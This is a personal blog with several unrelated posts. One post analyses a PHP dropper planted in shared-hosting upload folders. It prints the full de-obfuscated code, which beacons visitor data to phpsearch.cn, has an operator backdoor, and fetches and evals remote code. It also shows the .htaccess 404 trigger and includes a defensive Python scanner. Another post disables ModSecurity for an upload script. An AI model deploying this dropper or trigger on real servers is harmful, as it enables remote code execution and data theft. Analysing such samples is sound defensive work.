Cosmic Bowl Sucks

Well, to be really honest, the light setting and the loud music are really cool. However, I feel that the bowling alley is poorly maintained. Discolored screens and malfunctioning equipment really helped to spoil the mood for a good bowling night.

I was playing in lane 36 on Friday after work and counted at least 8 malfunctions. Either the pinsetter didn’t place any pins, or the spotting tongs kept dropping one pin. It sucks and it really spoiled the playing mood.

I don’t recommend Cosmic Bowl Mid Valley for company events or casual games either.

Upload Folder Invasions and Security

I was doing a routine backup job for a client’s website hosted on Exabytes the other day and noticed something funny. There were supposed to be only image, PDF and video files in the upload folders, but there were also .htaccess and PHP files in the main upload folder and in each of the subfolders.

The first thing that crossed my mind was that my code was not secure enough – it’s difficult to handle Flash upload security, so I used only some basic techniques to prevent illegal uploads. However, I decided to look into Internet Webhosting’s server (I also have an account there) and saw the same thing happening in a fellow blogger’s WordPress upload folder – which coincidentally is on the same server as my other account. I have so many “other” accounts that I sometimes lose track.

Testing further, I found that I am able to manipulate files located in other users’ upload folders if they are set to permission 777 (drwxrwxrwx). I was able to create new files, move existing files and, even worse, delete them. Technically this is because the web server process (the Apache httpd binary, which a distribution may call apache, apache2 or httpd) usually runs as the user nobody or another single common account on a shared server, and with mod_php every customer’s PHP scripts run inside that same process. So it really does not matter whose PHP file is requested from the browser: to the file system it is always the same user, with the same permissions.

So on a normal shared host, other customers’ scripts are actually able to read and copy your source code if you’re running something custom (in contrast to WordPress, which is publicly available anyway). Your files have to be readable by the web server user for your site to work at all, and every other customer’s PHP runs as that user. The 777 setting on the upload folder is what additionally lets them write there.

This particular finding is about the upload folders; it does not by itself affect other parts of the website or the database (although a configuration file readable by the shared web server user is how database credentials leak in the same setup).

I am NOT going to post the code I used to check and test these claims, so it’s really up to you whether or not to trust me.

However, the following code was in the foreign PHP files (they were named with numbers – XXXXX.php), all on one line, most probably to make it harder to read. I cleaned it up to improve readability:

 1  <?php
 2  error_reporting(0);                                   // hide warnings from the victim's pages and logs
 3  $a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
 4  $b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
 5  $c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
 6  $d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
 7  $e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
 8  $f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
 9  $g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
10  $h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
11  $i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
12  $j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
13  
14  $z = "/?" . base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".e." . base64_encode($i) . "." . base64_encode($j);   // beacon: every request detail, base64-encoded
15  $f = base64_decode("cGhwc2VhcmNoLmNu");              // decodes to the operator's domain
16  if (basename($c) == basename($i) && isset($_REQUEST["q"]) && md5($_REQUEST["q"]) == "51e1225f5f7bca58cb02a7cf6a96dddd")
17      $f = $_REQUEST["id"];                             // operator backdoor: repoint to another domain
18  if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));   // 1st attempt: remote include ("http://ads1.")
19  else if($c = file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))   // 2nd attempt: fopen wrapper ("http://7.")
20      eval($c);
21  else
22  {
23      $cu = curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);   // 3rd attempt: cURL ("http://71.")
24      curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
25      $o = curl_exec($cu);
26      curl_close($cu);
27      eval($o);
28  };
29  ?>

Lines 3-12 collect data about the request: host name, request URI, script path, query string, referer, user agent, the visitor’s IP address, the script’s location on disk and the browser language.
Line 14 packs all of it, base64-encoded and dot-separated, into the variable $z, which becomes the query string of every call home. So each hit on the script also reports these details to the operator.
$f is the variable that holds the domain of the culprit: phpsearch.cn

print base64_decode('cGhwc2VhcmNoLmNu');

Lines 16-17 are a backdoor for the operator rather than for visitors: when the script is requested directly (the basename of the request URI matches the script file name, so not via the 404 handler described below) and the q parameter hashes to 51e1225f5f7bca58cb02a7cf6a96dddd, the domain is replaced by whatever the id parameter contains. That lets them repoint every infected host to a new server without re-uploading anything.
Line 18 tries to include the remote file http://ads1.phpsearch.cn/?(collected_data). This only works where PHP allows remote includes, but when it does, the response is executed as PHP.

print base64_decode('aHR0cDovL2FkczEu');

Line 19 tries file_get_contents() on http://7.phpsearch.cn/?(collected_data) (this needs allow_url_fopen), and line 20 evals whatever came back.

print base64_decode('aHR0cDovLzcu');

And the final attempt in lines 23-27 uses the cURL extension to load http://71.phpsearch.cn/?(collected_data) and again evals the response.

print base64_decode('aHR0cDovLzcxLg==');

Whichever of the three succeeds, the result is the same: the server runs arbitrary PHP chosen by the attacker at request time. The file on disk contains no payload of its own, only the fetch, so what it actually does can change from one request to the next.

How is this possible? Well, they also uploaded .htaccess files that look like this:

Options -MultiViews
ErrorDocument 404 //path/to/upload/folder/subfolder/XXXXXX.php

And yes, it only fires when a 404 (file not found) is encountered under that folder: Apache then serves the planted script as the error page, and the script fetches and runs the remote payload. That also keeps it out of sight, since no link on the site ever points at it. But still, I don’t like the intrusion. Wouldn’t you?

There is no real workaround at the file-permission level as long as PHP runs as that one shared user, because users will always have to make the upload folder writable by it, which on a shared box means 777. Changing the group ownership to the group used by the httpd process does not help either: every other customer’s scripts run in that same group. The actual fix has to come from the host, by running each account’s PHP as the account’s own Unix user (suEXEC/suPHP, or PHP as CGI/FastCGI per account). A script can then only touch files its owner can, and upload folders can stay at 755, owned by you. The tell-tale sign of such a setup is that you never need to chmod an upload folder to 777.

However, GoDaddy seems to have a good technique for overcoming this problem, as I can’t access other users’ folders there. It has been a while since I first wanted to find out how they implemented it; I noticed it the first time I used their hosting, since I didn’t have to change permissions on my upload folders.
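A quick check an administrator can run over an upload tree for exactly the indicators described in this post, as an added example (this is not the author’s unpublished test code, and unlike that code it only reads your own account): it walks the folder and flags world-writable directories, any PHP file, any .htaccess that routes an error code to a script, and the fetch-and-eval idiom inside scripts. The allowed extensions, the temporary directory layout and the file contents in build_demo_tree() are constructed for the demo, and the domain in the stand-in dropper is a placeholder, not the real one.

```python
import os
import re
import stat
import tempfile

# What an upload folder on this site is supposed to hold (assumption: images, PDFs, video).
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".mp4", ".flv", ".mov"}
SCRIPT_EXT = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}

# Indicators taken from the sample above: a 404 handler pointing at a script,
# and the fetch-and-eval idiom (include/file_get_contents/curl + eval, base64 strings).
ERRORDOC_TO_SCRIPT = re.compile(r"^\s*ErrorDocument\s+\d{3}\s+\S+\.php\b", re.I | re.M)
REMOTE_EVAL = re.compile(r"\b(eval|base64_decode|curl_init|file_get_contents)\s*\(", re.I)


def read_text(path):
    with open(path, "r", errors="replace") as fh:
        return fh.read()


def scan_upload_tree(root):
    """Walk root and return sorted (relative_path, reason) findings."""
    findings = []
    for dirpath, _subdirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        # The 777 setting the post describes: anyone on the box can write here.
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            findings.append((rel_dir, "world-writable directory"))
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            ext = os.path.splitext(name)[1].lower()
            if name == ".htaccess":
                if ERRORDOC_TO_SCRIPT.search(read_text(full)):
                    findings.append((rel, ".htaccess routes an error code to a PHP script"))
                else:
                    findings.append((rel, ".htaccess present in upload folder"))
            elif ext in SCRIPT_EXT:
                reason = "PHP script in upload folder"
                if REMOTE_EVAL.search(read_text(full)):
                    reason += ", fetches or evals code"
                findings.append((rel, reason))
            elif ext not in ALLOWED_EXT:
                findings.append((rel, "unexpected file type"))
    return sorted(findings)


def build_demo_tree():
    """Create a constructed upload tree that mimics the intrusion (not real data)."""
    root = tempfile.mkdtemp(prefix="uploads-")
    sub = os.path.join(root, "2009", "03")
    os.makedirs(sub)
    with open(os.path.join(sub, "photo.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0")            # legitimate JPEG header
    with open(os.path.join(sub, ".htaccess"), "w") as fh:
        fh.write("Options -MultiViews\nErrorDocument 404 //uploads/2009/03/18273.php\n")
    with open(os.path.join(sub, "18273.php"), "w") as fh:
        # Constructed stand-in for the dropper; the base64 is "example.invalid", a placeholder.
        fh.write('<?php error_reporting(0); $f=base64_decode("ZXhhbXBsZS5pbnZhbGlk");'
                 'eval(file_get_contents("http://".$f."/")); ?>')
    os.chmod(root, 0o777)
    os.chmod(sub, 0o777)
    return root


def scan_demo():
    """Build the demo tree and scan it; returns the findings list."""
    return scan_upload_tree(build_demo_tree())


if __name__ == "__main__":
    for path, reason in scan_demo():
        print(f"{path}: {reason}")
```

On a real host, call scan_upload_tree() on the actual upload directory instead of the demo tree. Anything it reports as a PHP script should be quarantined rather than deleted outright, so the beacon URL and the operator domain can be decoded as done above before the evidence is gone.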

PayPal in Bahasa Melayu

I recently received an email from PayPal announcing that they now support additional languages. One of them is my native tongue, Bahasa Melayu.

However, when I clicked on the Malaysian flag it directed me to the same page as Bahasa Indonesia. Although many parts of the Internet have already acknowledged and are well aware that these two languages are different, I am a tad surprised that PayPal is not one of them 🙂


2.59MB/Sec Download

I had to download the Flex SDK for work today, and when I saw the file size I thought I could take some time for a coffee and a smoking break, but I was wrong. I am not making a big deal out of it, but I guess home users in Malaysia have never experienced this before.

The 118MB file was downloaded in less than a minute!

Oh yes, the file was downloaded to a server at the HQ in Massachusetts.

How I wish I got that at home! I am wondering whether US homes also get the same kind of speed. My dear US readers, could you please shed some light on this?

Weird IP Mismatch on TMNET Network

Tonight’s Internet access was annoyingly slow, so I thought of recycling my ADSL connection. Out of habit I opened WhatIsMyIP.us and was presented with a weird IP.

The top text with the black background is the actual IP my router was assigned (60.52.127.200).

Then I recycled my ADSL connection. The new IP was 60.50.203.72. However, when I opened the site above again it still showed me the same IP. There is something fishy about this.

I tried ProxyWay and here’s what I got:

And here’s from CheckIP:

The two sites that gave me the correct and matching IP are IPChicken and IP-adress:

What the hell is wrong? Since TMNET has a reputation for doing stupid things, right now I am thinking that they are testing some kind of HTTP bypassing. This is because the other traffic I tested was not affected (e.g. SSH and FTP) and there I see my “real” IP fine.

Is anyone else experiencing this twilight-zone scenario?

What Happened to Marché Mövenpick

I went to have lunch at The Curve on Saturday and was a bit disappointed by the lack of staff and all the waiting we had to do. While I understand that the system is for you to order and wait, they should not have asked people to come back in 5 minutes if we actually had to wait for 20.

I ordered the 1/2 Roasted Chicken meal, and the guy attending the stall was also the same guy cooking the mixed vegetables at the next stall. And the funniest thing of all is that while the menu said roasted chicken, they were actually reheating it on the grill. Yes, on the grill. So the chicken gets charred, tastes like charcoal and loses all its moisture. The vegetables were all dried up, and I think that the menu has been changed (many meals have been removed).

The roasted chicken in the same restaurant used to be moist and juicy, and the gravy was superb. This time they provided BBQ sauce.

Using the grill also means that it takes a lot longer than the oven. I saw that the oven was switched off, so I think this may be a step to cut some costs?

What’s wrong with the restaurant? Are they so affected by the economy that they decided to serve improper food and lousy service, and jeopardize the whole business?

I won’t be visiting this restaurant anytime soon unless someone really wants to eat something from the menu (the mixed vege and the sautéed mushrooms still taste the same). I’ll just go to Kenny Rogers for roasted chicken.

Flash Uploader Error

I was using YUI Uploader for a personal project and it worked very well on my development notebook and server. However, when the code went live on the hosting server, the Flash uploader failed with this error message:

[IOErrorEvent type="ioError" bubbles=false cancelable=false eventPhase=2 text="Error #2038"]

After a while I realized that it must be something server-side, because when I used Wireshark to look at the traffic, the server was returning HTTP 500. The traffic is not captured by Firebug because it comes from the Flash plugin, not from the browser itself.

The culprit is ModSecurity, a third-party Apache module used by many hosting companies. ModSecurity is a web application firewall that can run either embedded into Apache or as a reverse proxy in front of it. When one of its rules blocks the multipart POST, the Flash plugin only sees a failed request and reports it as the generic Error #2038 above.

A quick fix to allow uploads is to include the following in the .htaccess file. The three blocks cover the different combinations of Apache and ModSecurity versions, and since each is wrapped in an IfModule directive, no error is thrown where that module is unavailable. This relieves you of having to find out which versions are on the server. Two caveats: the directives only take effect if the host’s AllowOverride setting permits ModSecurity directives in .htaccess (otherwise you will have to ask the host to make the change), and with the engine switched off for upload.php that script is no longer protected by the WAF at all, so it must do its own validation of what it accepts and where it writes it. On ModSecurity 2.x a narrower fix is to leave the engine on and remove only the rule ID that the audit log shows firing, using SecRuleRemoveById in the same Files block.

For this example the script that handles the upload is named upload.php.

# Apache 1.x and ModSecurity 1.x
<IfModule mod_security.c>
   <Files upload.php>
      SecFilterEngine Off
      SecFilterScanPOST Off
   </Files>
</IfModule>

# Apache 2.x and ModSecurity 1.x
<IfModule security_module>
   <Files upload.php>
      SecFilterEngine Off
      SecFilterScanPOST Off
   </Files>
</IfModule>

# Apache 2.x and ModSecurity 2.x
<IfModule security2_module>
   <Files upload.php>
      SecRuleEngine Off
      SecRequestBodyAccess Off
   </Files>
</IfModule>

That’s it! This fixes the Flash uploader problem.

By the way, it might be useful to know that this issue was encountered on a server hosted under the Ebiz Linux package by Exabytes.